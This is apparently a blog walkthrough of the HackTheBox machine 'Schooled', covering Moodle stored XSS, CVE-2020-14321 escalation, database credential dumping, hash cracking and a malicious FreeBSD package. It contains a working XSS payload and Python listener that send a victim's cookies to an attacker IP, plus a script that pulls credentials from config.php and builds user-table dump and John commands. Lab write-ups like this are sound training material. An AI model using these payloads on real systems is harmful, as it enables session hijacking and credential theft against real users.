🔎🦶Enumeration/Foothold

Schooled is a Medium box from HTB created by TheCyberGeek. This box features an XSS attack and privilege escalation through Moodle, followed by a malicious pkg package on FreeBSD for root. I begin each box by running RustScan. This is bundled into my setup.sh script, which I've mentioned in a few of my other posts. Running RustScan with NMAP shows Port 80 open and serving a plain HTML website. This tells me that I should be looking for a subdomain or a different port, as in the majority of cases a static HTML site only holds clues and rabbit holes.

Seeing an HTML based website with a contact form on Port 80.

I head over to the website and I'm presented with a site for an online institute. I notice the footer states By HTML Design, so I verify that it is static HTML by browsing to index.html. I also see the domain schooled.htb referenced, so I add it to my hosts file and navigate around the remainder of the site.

Schooled domain referenced as well as HTML based design.

While reviewing the site I also start a vhost scan with GoBuster. A moodle subdomain pops after a few seconds. I add moodle.schooled.htb to my hosts file and head over to the site.

Running GoBuster to find an additional vhost.

After arriving at the Moodle subdomain I poke around the site. Accessing the classes requires an account, so I try to register one. The error message on the registration form reveals an additional subdomain, student.schooled.htb, which is the email domain it insists on.

Registration for moodle.schooled.htb

Navigating to the new subdomain just brings me back to the main site, so I continue the registration process, replacing my @islanddog.ky address with an @student.schooled.htb one. I am able to log in and successfully enrol in the Mathematics class.

Registering for the Mathematics class

After poking around the Private Files and Picture areas of the profile page looking for a way to escalate, I notice the following under Announcements:

Reminder for the MoodleNet profile.

This tells me the teacher is going to be constantly checking my profile for a MoodleNet profile link, which means she will be opening my profile page in her own browser. I put an XSS payload in the MoodleNet profile field that sends document.cookie to my machine, start an nc listener and wait.

MoodleNet profile xss

I see the cookie come through and use the Cookie Editor plugin for Firefox to take over the session.
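To make the exfiltration step concrete, the following is an added example written for this write-up; it is not the author's payload and not anything from Moodle. It pairs the tag that goes into the MoodleNet profile field with a small Python listener that stands in for the raw nc listener and parses the stolen cookie out of the request. The attacker address 10.10.14.5 and port 9001 are assumptions, and the request used to exercise the parser is constructed.

```python
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

ATTACKER_HOST = "10.10.14.5"  # assumption: attacker's HTB VPN address
ATTACKER_PORT = 9001          # assumption: listener port


def build_payload(host: str, port: int) -> str:
    """Payload for the MoodleNet profile field.

    The image never loads, so onerror fires and rewrites its src to our
    listener with the victim's cookies in the query string.
    encodeURIComponent keeps ';' and '=' from breaking the URL.
    """
    return (
        '<img src=x onerror="this.src='
        f"'http://{host}:{port}/?c='+encodeURIComponent(document.cookie)\">"
    )


def extract_cookies(request_target: str) -> dict:
    """Parse the ?c= parameter of an exfil request into a cookie dict."""
    query = urllib.parse.urlsplit(request_target).query
    raw = urllib.parse.parse_qs(query).get("c", [""])[0]
    cookies = {}
    for part in raw.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


class ExfilHandler(BaseHTTPRequestHandler):
    """Answers every GET with 200 and prints the cookies it carried."""

    def do_GET(self):
        cookies = extract_cookies(self.path)
        if cookies:
            print(f"[+] {self.client_address[0]} leaked: {cookies}")
        self.send_response(200)
        self.end_headers()

    def log_message(self, fmt, *args):  # keep stdout to the leaked cookies
        pass


if __name__ == "__main__":
    print("[*] paste into the MoodleNet profile field:")
    print(build_payload(ATTACKER_HOST, ATTACKER_PORT))
    print(f"[*] listening on 0.0.0.0:{ATTACKER_PORT}")
    HTTPServer(("0.0.0.0", ATTACKER_PORT), ExfilHandler).serve_forever()
```

Run it on the attack machine, paste the printed tag into the MoodleNet profile field, and the leaked MoodleSession value is what goes into Cookie Editor. One caveat worth checking before relying on this: if the site had Moodle's cookiehttponly setting enabled, document.cookie would not include the session cookie, and the same XSS would have to drive the teacher's session from inside her browser instead of handing it over.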

The student has become the teacher

I look around the teacher's account for my next privilege escalation. After coming up dry I research Moodle with teacher access and eventually find GitHub.com – lanzt – CVE-2020-14321. The vulnerability lets a teacher enrol a manager into their own course and then use Moodle's "Log in as" to take over that manager account, from which site-wide privileges follow. After pulling the repo I realize I don't have the pwn module (pwntools), which the script imports, so I install it with pip and run the script.

Running the CVE-2020-14321 exploit with a one-liner reverse shell

🔝Escalation

After establishing a low-privilege session I navigate around the Moodle install, looking for config.php, since that is where Moodle stores its database credentials.

Moodle database credentials found

Not knowing the FreeBSD platform very well I stumble around until I find the MySQL install (under /usr/local, where FreeBSD puts ports and packages). I log in to the database with the credentials from config.php and dump the mdl_user table.

admin hash found

I take the admin hash and run it through John. While navigating the environment earlier and figuring out MySQL I noticed that jamie was also a user on the box. With SSH open, I use the cracked password to log in as jamie.

john cracking the admin password hash
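Tying the three steps together, here is an added helper written for this write-up (not the author's commands and not Moodle code): it reads the database settings out of config.php, builds the mysql command for the user-table dump using $CFG->prefix instead of assuming mdl_, and picks the John format from the hash prefix. The config.php text is constructed for the example with a made-up password; /usr/local/bin/mysql (the FreeBSD ports location) and /usr/share/wordlists/rockyou.txt are assumptions.

```python
import re
import shlex

# Constructed config.php fragment in the shape Moodle writes it; the
# password is made up and is not the box's real value.
SAMPLE_CONFIG = """<?php
unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG->dbtype    = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'moodle';
$CFG->dbpass    = 'ExamplePassw0rd';
$CFG->prefix    = 'mdl_';
$CFG->wwwroot   = 'http://moodle.schooled.htb/moodle';
"""

# $CFG->key = 'value';  (single-quoted PHP string, backslash escapes allowed)
CFG_RE = re.compile(r"\$CFG->(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")


def parse_moodle_config(text: str) -> dict:
    """Return every single-quoted $CFG->key = 'value'; assignment."""
    return {k: v.replace("\\'", "'") for k, v in CFG_RE.findall(text)}


def mysql_dump_cmd(cfg: dict, mysql="/usr/local/bin/mysql") -> list:
    """argv that dumps usernames and hashes, honouring the table prefix."""
    table = cfg.get("prefix", "mdl_") + "user"
    query = f"SELECT username, password FROM {table};"
    return [mysql, "-h", cfg["dbhost"], "-u", cfg["dbuser"],
            f"-p{cfg['dbpass']}", cfg["dbname"], "-e", query]


def john_format(hash_value: str) -> str:
    """Map the hash prefix to a John format; Moodle >= 2.5 stores bcrypt."""
    if hash_value.startswith(("$2y$", "$2a$", "$2b$")):
        return "bcrypt"
    if hash_value.startswith("$6$"):
        return "sha512crypt"
    if re.fullmatch(r"[0-9a-f]{32}", hash_value):
        return "raw-md5"  # legacy Moodle (pre-2.5) passwords
    raise ValueError(f"unrecognised hash: {hash_value!r}")


def john_cmd(hash_file: str, hash_value: str,
             wordlist="/usr/share/wordlists/rockyou.txt") -> list:
    """argv for the cracking run, with the format chosen from the hash."""
    return ["john", f"--format={john_format(hash_value)}",
            f"--wordlist={wordlist}", hash_file]


if __name__ == "__main__":
    cfg = parse_moodle_config(SAMPLE_CONFIG)
    print(shlex.join(mysql_dump_cmd(cfg)))
    demo_hash = "$2y$10$" + "x" * 53  # shape of a bcrypt hash, not a real one
    print(shlex.join(john_cmd("admin.hash", demo_hash)))
```

Passing the password with -p on the command line exposes it in the process list, which is fine on a CTF box but worth remembering elsewhere. Moodle has stored bcrypt since 2.5, so expect $2y$ hashes and --format=bcrypt; the 32-character hex case only turns up on installs migrated from very old versions.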

The first thing I do on the box is sudo -l, which comes back with some interesting permissions. Googling around I find LastSummer.de – Creating Custom Packages on FreeBSD and GitHub – freebsd/pkg, and use them to write a .sh script that builds a custom package.

📜Script


I upload the script to Jamie's SSH session and run it.

⚠ Attack Machine


🎯Victim Machine


I finalized this machine while on the road using my laptop and thus the images/script used are not present. I will hopefully not be lazy and update this in the future!

Rooted

Published On: September 10th, 2021 / Categories: HTB, Technology